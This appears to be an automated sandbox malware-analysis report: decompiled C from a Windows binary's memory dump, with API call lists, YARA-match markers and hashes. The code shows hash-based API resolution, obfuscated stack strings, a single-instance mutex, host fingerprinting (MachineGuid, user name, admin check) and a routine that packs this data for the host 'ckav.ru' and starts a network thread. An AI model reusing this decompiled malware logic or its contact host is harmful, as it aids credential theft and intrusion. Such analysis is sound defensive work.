                      				struct _SECURITY_ATTRIBUTES* _v8;
                      				char _v12;
                      				long _v16;
                      				void* __ebx;
                      				void* __edi;
                      				void* _t16;
                      				intOrPtr* _t25;
                      				long* _t28;
                      				void* _t30;
                      				int _t32;
                      				intOrPtr* _t33;
                      				void* _t35;
                      				void* _t42;
                      				intOrPtr _t43;
                      				long _t44;
                      				struct _OVERLAPPED* _t46;
                      
                      				_t46 = 0;
                      				_t35 = 0;
                      				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                      				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                      				_t42 = _t16;
                      				_v8 = _t42;
                      				if(_t42 == 0xffffffff) {
                      					__eflags = _a12;
                      					if(_a12 == 0) {
                      						L10:
                      						return _t35;
                      					}
                      					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                      					__eflags = _t43;
                      					if(_t43 == 0) {
                      						goto L10;
                      					}
                      					_push(0);
                      					__eflags = E00403C59(_a4, _t43);
                      					if(__eflags != 0) {
                      						_v8 = 0;
                      						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                      						_push(_t43);
                      						 *_a8 = _v8;
                      						E00403D44();
                      					}
                      					E00402BAB(_t43);
                      					return _t46;
                      				}
                      				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                      				_t44 =  *_t25(_t42,  &_v12);
                      				if(_v12 != 0 || _t44 > 0x40000000) {
                      					L8:
                      					_t45 = _v8;
                      					goto L9;
                      				} else {
                      					_t28 = _a8;
                      					if(_t28 != 0) {
                      						 *_t28 = _t44;
                      					}
                      					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                      					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                      					_t35 = _t30;
                      					if(_t35 == 0) {
                      						goto L8;
                      					} else {
                      						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                      						_t45 = _v8;
                      						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                      						if(_t32 == 0) {
                      							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                      							 *_t33(_t35, _t46, 0x8000);
                      							_t35 = _t46;
                      						}
                      						L9:
                      						E00403C40(_t45); // executed
                      						goto L10;
                      					}
                      				}
                      			}

                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: File$AllocCreateReadVirtual
                      • String ID: .tmp
                      • API String ID: 3585551309-2986845003
                      • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                      • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 79%
                      			E00413866(void* __eflags) {
                      				short _v6;
                      				short _v8;
                      				short _v10;
                      				short _v12;
                      				short _v14;
                      				short _v16;
                      				short _v18;
                      				short _v20;
                      				short _v22;
                      				char _v24;
                      				short _v28;
                      				short _v30;
                      				short _v32;
                      				short _v34;
                      				short _v36;
                      				short _v38;
                      				short _v40;
                      				short _v42;
                      				short _v44;
                      				short _v46;
                      				char _v48;
                      				short _v52;
                      				short _v54;
                      				short _v56;
                      				short _v58;
                      				short _v60;
                      				short _v62;
                      				short _v64;
                      				short _v66;
                      				short _v68;
                      				short _v70;
                      				short _v72;
                      				short _v74;
                      				char _v76;
                      				void* __ebx;
                      				void* __edi;
                      				void* _t38;
                      				short _t43;
                      				short _t44;
                      				short _t45;
                      				short _t46;
                      				short _t47;
                      				short _t48;
                      				short _t50;
                      				short _t51;
                      				short _t52;
                      				short _t54;
                      				short _t55;
                      				intOrPtr* _t57;
                      				intOrPtr* _t59;
                      				intOrPtr* _t61;
                      				void* _t63;
                      				WCHAR* _t65;
                      				long _t68;
                      				void* _t75;
                      				short _t76;
                      				short _t78;
                      				short _t83;
                      				short _t84;
                      				short _t85;
                      
                      				E00402C6C(_t38);
                      				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                      				SetErrorMode(3); // executed
                      				_t43 = 0x4f;
                      				_v76 = _t43;
                      				_t44 = 0x4c;
                      				_v74 = _t44;
                      				_t45 = 0x45;
                      				_v72 = _t45;
                      				_t46 = 0x41;
                      				_v70 = _t46;
                      				_t47 = 0x55;
                      				_v68 = _t47;
                      				_t48 = 0x54;
                      				_t76 = 0x33;
                      				_t84 = 0x32;
                      				_t83 = 0x2e;
                      				_t78 = 0x64;
                      				_t85 = 0x6c;
                      				_v66 = _t48;
                      				_v52 = 0;
                      				_t50 = 0x77;
                      				_v48 = _t50;
                      				_t51 = 0x73;
                      				_v46 = _t51;
                      				_t52 = 0x5f;
                      				_v42 = _t52;
                      				_v28 = 0;
                      				_t54 = 0x6f;
                      				_v24 = _t54;
                      				_t55 = 0x65;
                      				_v20 = _t55;
                      				_v64 = _t76;
                      				_v62 = _t84;
                      				_v60 = _t83;
                      				_v58 = _t78;
                      				_v56 = _t85;
                      				_v54 = _t85;
                      				_v44 = _t84;
                      				_v40 = _t76;
                      				_v38 = _t84;
                      				_v36 = _t83;
                      				_v34 = _t78;
                      				_v32 = _t85;
                      				_v30 = _t85;
                      				_v22 = _t85;
                      				_v18 = _t76;
                      				_v16 = _t84;
                      				_v14 = _t83;
                      				_v12 = _t78;
                      				_v10 = _t85;
                      				_v8 = _t85;
                      				_v6 = 0;
                      				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                      				 *_t57( &_v76);
                      				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                      				 *_t59( &_v48);
                      				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                      				_t81 =  &_v24;
                      				 *_t61( &_v24); // executed
                      				_t63 = E00414059(); // executed
                      				if(_t63 != 0) {
                      					_t65 = E00413D97(0);
                      					E004031E5(0, 0, 0xcf167df4, 0, 0);
                      					CreateMutexW(0, 1, _t65); // executed
                      					_t68 = GetLastError();
                      					_t92 = _t68 - 0xb7;
                      					if(_t68 == 0xb7) {
                      						E00413B81(0);
                      						_pop(_t81); // executed
                      					}
                      					E00413003(_t92); // executed
                      					E00412B2E(_t92); // executed
                      					E00412D31(_t81, _t84); // executed
                      					E00413B3F();
                      					E00413B81(0);
                      					 *0x49fdd0 = 1;
                      				}
                      				return 0;
                      			}

                      APIs
                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                      • GetLastError.KERNEL32 ref: 0041399E
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Error$CreateLastModeMutex
                      • String ID:
                      • API String ID: 3448925889-0
                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                      				long _v8;
                      				void* _t7;
                      				long _t10;
                      				void* _t21;
                      				struct _OVERLAPPED* _t24;
                      
                      				_t14 = __ebx;
                      				_t24 = 0;
                      				_v8 = 0;
                      				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                      				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                      				_t21 = _t7;
                      				if(_t21 != 0xffffffff) {
                      					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                      					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                      					if(_t10 != 0xffffffff) {
                      						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                      						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                      						_t24 =  !=  ? 1 : 0;
                      					}
                      					E00403C40(_t21); // executed
                      				}
                      				return _t24;
                      			}

                      APIs
                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: File$CreatePointerWrite
                      • String ID:
                      • API String ID: 3672724799-0
                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 34%
                      			E00412D31(void* __ecx, void* __edi) {
                      				long _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v24;
                      				char _v40;
                      				void* __ebx;
                      				intOrPtr* _t10;
                      				void* _t11;
                      				void* _t25;
                      				void* _t26;
                      				void* _t27;
                      				void* _t35;
                      				void* _t53;
                      				char* _t57;
                      				void* _t58;
                      				void* _t61;
                      				void* _t64;
                      				void* _t65;
                      				intOrPtr* _t66;
                      				void* _t67;
                      				void* _t68;
                      				void* _t69;
                      				void* _t70;
                      				void* _t71;
                      				void* _t72;
                      				void* _t73;
                      
                      				_t53 = __ecx;
                      				_t10 =  *0x49fde0;
                      				_t68 = _t67 - 0x24;
                      				 *0x49fddc = 0x927c0;
                      				 *0x49fde4 = 0;
                      				_t75 = _t10;
                      				if(_t10 != 0) {
                      					L16:
                      					_push(1);
                      					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                      					_t61 = _t11;
                      					_t68 = _t68 + 0xc;
                      					if(_t61 != 0) {
                      						E004031E5(0, 0, 0xfcae4162, 0, 0);
                      						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                      					}
                      					L004067C4(0xea60); // executed
                      					_pop(_t53);
                      				} else {
                      					_push(__edi);
                      					 *0x49fde0 = E004056BF(0x2bc);
                      					E00413DB7(_t53, _t75,  &_v40);
                      					_t57 =  &_v24;
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					E004058D4( *0x49fde0, 0x12);
                      					E004058D4( *0x49fde0, 0x28);
                      					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                      					_t69 = _t68 + 0x28;
                      					_t64 = E0040632F();
                      					_push(0);
                      					_push(1);
                      					if(_t64 == 0) {
                      						_push(0);
                      						_push( *0x49fde0);
                      						E00405872();
                      						_t70 = _t69 + 0x10;
                      					} else {
                      						_push(_t64);
                      						_push( *0x49fde0);
                      						E00405872();
                      						E00402BAB(_t64);
                      						_t70 = _t69 + 0x14;
                      					}
                      					_t58 = E00406130(_t57);
                      					_push(0);
                      					_push(1);
                      					_t77 = _t64;
                      					if(_t64 == 0) {
                      						_push(0);
                      						_push( *0x49fde0);
                      						_t25 = E00405872();
                      						_t71 = _t70 + 0x10; // executed
                      					} else {
                      						_push(_t58);
                      						_push( *0x49fde0);
                      						E00405872();
                      						_t25 = E00402BAB(_t58);
                      						_t71 = _t70 + 0x14;
                      					}
                      					_t26 = E004061C3(_t25, 0, _t77); // executed
                      					_t65 = _t26;
                      					_push(0);
                      					_push(1);
                      					if(_t65 == 0) {
                      						_push(0);
                      						_push( *0x49fde0);
                      						_t27 = E00405872();
                      						_t72 = _t71 + 0x10;
                      					} else {
                      						_push(_t65);
                      						_push( *0x49fde0);
                      						E00405872();
                      						_t27 = E00402BAB(_t65);
                      						_t72 = _t71 + 0x14;
                      					}
                      					_t66 = E00406189(_t27);
                      					_t79 = _t66;
                      					if(_t66 == 0) {
                      						E00405781( *0x49fde0, 0);
                      						E00405781( *0x49fde0, 0);
                      						_t73 = _t72 + 0x10;
                      					} else {
                      						E00405781( *0x49fde0,  *_t66);
                      						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                      						E00402BAB(_t66);
                      						_t73 = _t72 + 0x14;
                      					}
                      					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                      					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                      					_t35 = E0040642C(_t79); // executed
                      					E004058D4( *0x49fde0, _t35);
                      					E004058D4( *0x49fde0, _v24);
                      					E004058D4( *0x49fde0, _v20);
                      					E004058D4( *0x49fde0, _v16);
                      					E004058D4( *0x49fde0, _v12);
                      					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                      					_t68 = _t73 + 0x48;
                      				}
                      				_t80 =  *0x49fde4;
                      				if( *0x49fde4 == 0) {
                      					_t10 =  *0x49fde0;
                      					goto L16;
                      				}
                      				return E00405695(_t53,  *0x49fde0);
                      			}

                      0x00412d31
                      0x00412d34
                      0x00412d39
                      0x00412d3c
                      0x00412d49
                      0x00412d50
                      0x00412d52
                      0x00412f24
                      0x00412f24
                      0x00412f2b
                      0x00412f30
                      0x00412f32
                      0x00412f37
                      0x00412f41
                      0x00412f53
                      0x00412f53
                      0x00412f5b
                      0x00412f60
                      0x00412d58
                      0x00412d58
                      0x00412d63
                      0x00412d6c
                      0x00412d73
                      0x00412d7e
                      0x00412d7f
                      0x00412d80
                      0x00412d81
                      0x00412d82
                      0x00412d8f
                      0x00412da1
                      0x00412da6
                      0x00412dae
                      0x00412db0
                      0x00412db1
                      0x00412db5
                      0x00412dce
                      0x00412dcf
                      0x00412dd5
                      0x00412dda
                      0x00412db7
                      0x00412db7
                      0x00412db8
                      0x00412dbe
                      0x00412dc4
                      0x00412dc9
                      0x00412dc9
                      0x00412de2
                      0x00412de4
                      0x00412de5
                      0x00412de7
                      0x00412de9
                      0x00412e02
                      0x00412e03
                      0x00412e09
                      0x00412e0e
                      0x00412deb
                      0x00412deb
                      0x00412dec
                      0x00412df2
                      0x00412df8
                      0x00412dfd
                      0x00412dfd
                      0x00412e11
                      0x00412e17
                      0x00412e19
                      0x00412e1a
                      0x00412e1e
                      0x00412e37
                      0x00412e38
                      0x00412e3e
                      0x00412e43
                      0x00412e20
                      0x00412e20
                      0x00412e21
                      0x00412e27
                      0x00412e2d
                      0x00412e32
                      0x00412e32
                      0x00412e4b
                      0x00412e4d
                      0x00412e4f
                      0x00412e7e
                      0x00412e8a
                      0x00412e8f
                      0x00412e51
                      0x00412e59
                      0x00412e67
                      0x00412e6d
                      0x00412e72
                      0x00412e72
                      0x00412e9e
                      0x00412eaf
                      0x00412eb4
                      0x00412ec0
                      0x00412ece
                      0x00412edc
                      0x00412eea
                      0x00412ef8
                      0x00412f0f
                      0x00412f14
                      0x00412f14
                      0x00412f17
                      0x00412f1d
                      0x00412f1f
                      0x00000000
                      0x00412f1f
                      0x00412f74

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                        • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$CreateFreeProcessThread_wmemset
                      • String ID: ckav.ru
                      • API String ID: 2915393847-2696028687
                      • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                      • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040632F() {
                      				char _v8;
                      				void* _t4;
                      				void* _t7;
                      				void* _t16;
                      
                      				_t16 = E00402B7C(0x208);
                      				if(_t16 == 0) {
                      					L4:
                      					_t4 = 0;
                      				} else {
                      					E0040338C(_t16, 0, 0x104);
                      					_t1 =  &_v8; // 0x4143e8
                      					_v8 = 0x208;
                      					_t7 = E00406069(_t16, _t1); // executed
                      					if(_t7 == 0) {
                      						E00402BAB(_t16);
                      						goto L4;
                      					} else {
                      						_t4 = _t16;
                      					}
                      				}
                      				return _t4;
                      			}

                      0x00406340
                      0x00406345
                      0x00406373
                      0x00406373
                      0x00406347
                      0x0040634f
                      0x00406354
                      0x00406357
                      0x0040635c
                      0x00406366
                      0x0040636d
                      0x00000000
                      0x00406368
                      0x00406368
                      0x00406368
                      0x00406366
                      0x0040637a

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser_wmemset
                      • String ID: CA
                      • API String ID: 2078537776-1052703068
                      • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                      • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                      				int _t7;
                      				void* _t8;
                      
                      				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                      				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                      				return _t7;
                      			}

                      0x00406094
                      0x004060a8
                      0x004060ab

                      APIs
                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: InformationToken
                      • String ID: IDA
                      • API String ID: 4114910276-365204570
                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                      				_Unknown_base(*)()* _t5;
                      				void* _t6;
                      
                      				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                      				_t1 =  &_a8; // 0x403173
                      				_t5 = GetProcAddress(_a4,  *_t1); // executed
                      				return _t5;
                      			}

                      0x00402c10
                      0x00402c15
                      0x00402c1b
                      0x00402c1e

                      APIs
                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AddressProc
                      • String ID: s1@
                      • API String ID: 190572456-427247929
                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00404A52(void* _a4, char* _a8, char* _a12) {
                      				void* _v8;
                      				int _v12;
                      				void* __ebx;
                      				char* _t10;
                      				long _t13;
                      				char* _t27;
                      
                      				_push(_t21);
                      				_t27 = E00402B7C(0x208);
                      				if(_t27 == 0) {
                      					L4:
                      					_t10 = 0;
                      				} else {
                      					E00402B4E(_t27, 0, 0x208);
                      					_v12 = 0x208;
                      					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                      					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                      					if(_t13 != 0) {
                      						E00402BAB(_t27);
                      						goto L4;
                      					} else {
                      						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                      						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                      						E00404A39(_v8); // executed
                      						_t10 = _t27;
                      					}
                      				}
                      				return _t10;
                      			}

                      0x00404a56
                      0x00404a65
                      0x00404a6a
                      0x00404ad1
                      0x00404ad1
                      0x00404a6c
                      0x00404a71
                      0x00404a79
                      0x00404a85
                      0x00404a9a
                      0x00404a9e
                      0x00404acb
                      0x00000000
                      0x00404aa0
                      0x00404aac
                      0x00404abc
                      0x00404ac1
                      0x00404ac6
                      0x00404ac6
                      0x00404a9e
                      0x00404ad9

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateOpenProcessQueryValue
                      • String ID:
                      • API String ID: 1425999871-0
                      • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                      • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 40%
                      			E004060BD(void* __eflags) {
                      				signed int _v8;
                      				char _v12;
                      				short _v16;
                      				char _v20;
                      				void* __ebx;
                      				intOrPtr* _t12;
                      				signed int _t13;
                      				intOrPtr* _t14;
                      				signed int _t15;
                      				void* _t24;
                      
                      				_v16 = 0x500;
                      				_v20 = 0;
                      				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                      				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                      				_v8 = _t13;
                      				if(_t13 != 0) {
                      					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                      					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                      					asm("sbb eax, eax");
                      					_v8 = _v8 &  ~_t15;
                      					E0040604F(_v12);
                      					return _v8;
                      				}
                      				return _t13;
                      			}

                      0x004060c6
                      0x004060d5
                      0x004060d8
                      0x004060f4
                      0x004060f6
                      0x004060fb
                      0x0040610a
                      0x00406115
                      0x0040611c
                      0x0040611e
                      0x00406121
                      0x00000000
                      0x0040612a
                      0x0040612f

                      APIs
                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CheckMembershipToken
                      • String ID:
                      • API String ID: 1351025785-0
                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                      				void* _t3;
                      				int _t5;
                      
                      				_t3 = E00403D4D(__eflags, _a4); // executed
                      				if(_t3 == 0) {
                      					__eflags = 0;
                      					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                      					_t5 = CreateDirectoryW(_a4, 0); // executed
                      					return _t5;
                      				} else {
                      					return 1;
                      				}
                      			}

                      0x00403c68
                      0x00403c70
                      0x00403c78
                      0x00403c82
                      0x00403c8b
                      0x00403c8f
                      0x00403c72
                      0x00403c76
                      0x00403c76

                      APIs
                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CreateDirectory
                      • String ID:
                      • API String ID: 4241100979-0
                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 37%
                      			E0040642C(void* __eflags) {
                      				short _v40;
                      				intOrPtr* _t6;
                      				void* _t10;
                      
                      				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                      				 *_t6( &_v40); // executed
                      				return 0 | _v40 == 0x00000009;
                      			}

                      0x0040643c
                      0x00406445
                      0x00406454

                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                      Memory Dump Source
